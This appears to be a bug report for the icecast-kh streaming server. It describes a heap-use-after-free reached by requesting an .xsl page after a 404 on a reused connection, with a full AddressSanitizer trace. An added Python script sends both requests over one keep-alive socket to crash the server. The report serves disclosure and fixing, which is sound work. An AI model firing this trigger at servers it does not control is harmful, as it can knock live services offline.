Requesting an xsl after a 404 (with connection reuse) results in a use-after-free, as the client gets freed after processing the 404 but before processing the xsl.
==6794==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000254f0 at pc 0x7f35fd0925b3 bp 0x7f35f5afadd0 sp 0x7f35f5afa578
READ of size 1 at 0x6020000254f0 thread T5
#0 0x7f35fd0925b2 in __interceptor_strcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:466
#1 0x5645ae2757c7 in compare_mounts /home/tasos/icecast-kh/src/cfgfile.c:818
#2 0x5645ae35a3a6 in avl_get_by_key /home/tasos/icecast-kh/src/avl/avl.c:332
#3 0x5645ae289858 in config_find_mount /home/tasos/icecast-kh/src/cfgfile.c:1967
#4 0x5645ae2e64b0 in ice_http_setup_flags /home/tasos/icecast-kh/src/params.c:434
#5 0x5645ae2ea14e in xslt_prepare_response /home/tasos/icecast-kh/src/xslt.c:522
#6 0x5645ae2ea85c in xslt_update /home/tasos/icecast-kh/src/xslt.c:587
#7 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
#8 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442
#9 0x7f35fc52684f (/lib/x86_64-linux-gnu/libc.so.6+0x12684f)
0x6020000254f0 is located 0 bytes inside of 5-byte region [0x6020000254f0,0x6020000254f5)
freed by thread T2 here:
#0 0x7f35fd0b4537 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127
#1 0x5645ae2ebe6e in _delete_fh /home/tasos/icecast-kh/src/fserve.c:253
#2 0x5645ae2ecaeb in remove_from_fh /home/tasos/icecast-kh/src/fserve.c:319
#3 0x5645ae2ef8bc in file_release /home/tasos/icecast-kh/src/fserve.c:620
#4 0x5645ae2e09a6 in worker /home/tasos/icecast-kh/src/client.c:882
#5 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
#6 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442
previously allocated by thread T2 here:
#0 0x7f35fd05b9a7 in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:454
#1 0x5645ae2f244f in fserve_setup_client_fb /home/tasos/icecast-kh/src/fserve.c:978
#2 0x5645ae2f2fd9 in fserve_setup_client /home/tasos/icecast-kh/src/fserve.c:1056
#3 0x5645ae2f2f82 in client_http_send /home/tasos/icecast-kh/src/fserve.c:1049
#4 0x5645ae2dc0a9 in client_send_404 /home/tasos/icecast-kh/src/client.c:266
#5 0x5645ae2ef072 in fserve_client_create /home/tasos/icecast-kh/src/fserve.c:532
#6 0x5645ae31a12a in add_authenticated_listener /home/tasos/icecast-kh/src/auth.c:551
#7 0x5645ae31b8f8 in auth_add_listener /home/tasos/icecast-kh/src/auth.c:741
#8 0x5645ae299245 in _handle_get_request /home/tasos/icecast-kh/src/connection.c:1898
#9 0x5645ae29728e in http_client_request /home/tasos/icecast-kh/src/connection.c:1502
#10 0x5645ae2e08be in worker /home/tasos/icecast-kh/src/client.c:876
#11 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
#12 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442
Thread T5 created by T2 here:
#0 0x7f35fd058685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
#1 0x5645ae34b776 in thread_create_c /home/tasos/icecast-kh/src/thread/thread.c:342
#2 0x5645ae2eac8a in xslt_client /home/tasos/icecast-kh/src/xslt.c:635
#3 0x5645ae2eb079 in _xslt_transform /home/tasos/icecast-kh/src/xslt.c:664
#4 0x5645ae2eb0b3 in xslt_transform /home/tasos/icecast-kh/src/xslt.c:671
#5 0x5645ae2d6287 in stats_transform_xslt /home/tasos/icecast-kh/src/stats.c:1157
#6 0x5645ae319f51 in add_authenticated_listener /home/tasos/icecast-kh/src/auth.c:537
#7 0x5645ae31b8f8 in auth_add_listener /home/tasos/icecast-kh/src/auth.c:741
#8 0x5645ae299245 in _handle_get_request /home/tasos/icecast-kh/src/connection.c:1898
#9 0x5645ae29728e in http_client_request /home/tasos/icecast-kh/src/connection.c:1502
#10 0x5645ae2e08be in worker /home/tasos/icecast-kh/src/client.c:876
#11 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
#12 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442
Thread T2 created by T0 here:
#0 0x7f35fd058685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
#1 0x5645ae34b776 in thread_create_c /home/tasos/icecast-kh/src/thread/thread.c:342
#2 0x5645ae2e1189 in worker_start /home/tasos/icecast-kh/src/client.c:957
#3 0x5645ae2e1818 in workers_adjust /home/tasos/icecast-kh/src/client.c:1030
#4 0x5645ae2a9dd1 in slave_startup /home/tasos/icecast-kh/src/slave.c:1261
#5 0x5645ae2a9eeb in _slave_thread /home/tasos/icecast-kh/src/slave.c:1272
#6 0x5645ae2a1c21 in slave_initialize /home/tasos/icecast-kh/src/slave.c:256
#7 0x5645ae28a7fb in server_process /home/tasos/icecast-kh/src/main.c:236
#8 0x5645ae28b6dd in main /home/tasos/icecast-kh/src/main.c:435
#9 0x7f35fc429d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:466 in __interceptor_strcmp
Shadow bytes around the buggy address:
0x0c047fffca40: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fffca50: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fffca60: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fffca70: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fffca80: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
=>0x0c047fffca90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa[fd]fa
0x0c047fffcaa0: fa fa fd fa fa fa fd fa fa fa 04 fa fa fa 00 04
0x0c047fffcab0: fa fa 00 00 fa fa 00 03 fa fa 05 fa fa fa 00 00
0x0c047fffcac0: fa fa 00 02 fa fa 04 fa fa fa 00 00 fa fa 00 03
0x0c047fffcad0: fa fa 04 fa fa fa 00 00 fa fa 06 fa fa fa 00 04
0x0c047fffcae0: fa fa 00 00 fa fa 05 fa fa fa 00 07 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==6794==ABORTING
To reproduce, use this exact same command. Curl by default will not reuse the connection and thus won't trigger this issue.
Note the connection reuse:
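The reporter's reproduction command is not on the page. The script below is an added example, not the reporter's command or part of icecast-kh, that performs the two steps the report describes: it opens a single TCP connection, sends a request for a path that yields a 404, and then, on the same connection, a request for an .xsl page, so the server handles both on one client object. The host `127.0.0.1`, port `8000`, the non-existent path `/does-not-exist` and the XSLT page `/status.xsl` are assumptions; adjust them to the target. `split_responses` only delimits responses by `Content-Length`, which is enough to count how many answers came back before the server stopped responding.

```python
"""Added example (not the reporter's command): two HTTP/1.1 requests over one
keep-alive TCP connection, a 404 followed by an .xsl request, so the server
processes both on the same client. Host, port and paths are assumptions."""
import socket

HOST = "127.0.0.1"                            # assumption: local icecast-kh
PORT = 8000                                   # assumption: default listen port
PATHS = ["/does-not-exist", "/status.xsl"]    # assumption: 404 first, then XSLT


def build_pipelined_requests(host: str, paths: list) -> bytes:
    """Build back-to-back HTTP/1.1 GETs that all ask the server to keep the
    connection open, so the second request is handled on the same client
    object that just served the first (the situation the report describes)."""
    out = []
    for path in paths:
        out.append(
            f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: keep-alive\r\n"
            "\r\n"
        )
    return "".join(out).encode("ascii")


def split_responses(raw: bytes) -> list:
    """Return the status codes of consecutive HTTP/1.x responses in one buffer.
    Responses are delimited via Content-Length; a response without it ends the
    scan, since its length cannot be known without reading to EOF."""
    codes = []
    pos = 0
    while True:
        end = raw.find(b"\r\n\r\n", pos)
        if end < 0:
            return codes
        lines = raw[pos:end].decode("latin-1").split("\r\n")
        parts = lines[0].split(" ", 2)
        if len(parts) < 2 or not parts[0].startswith("HTTP/"):
            return codes
        codes.append(int(parts[1]))
        length = None
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        if length is None:
            return codes
        pos = end + 4 + length
        if pos > len(raw):          # body truncated: status already recorded
            return codes


def reproduce(host=HOST, port=PORT, paths=PATHS, timeout=3.0) -> list:
    """Open ONE TCP connection, write every request, then collect whatever
    the server answers until it closes the socket or goes quiet. A server
    that aborts under ASan typically returns fewer responses than requests."""
    payload = build_pipelined_requests(host, paths)
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        while True:
            try:
                chunk = s.recv(65536)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
    return split_responses(buf)


if __name__ == "__main__":
    codes = reproduce()
    print(f"sent {len(PATHS)} requests on one connection, got responses: {codes}")
```

Run it against an ASan build of the server; with both requests on one connection you should see the server abort with the heap-use-after-free report above, whereas issuing the same two requests as separate connections does not trigger it.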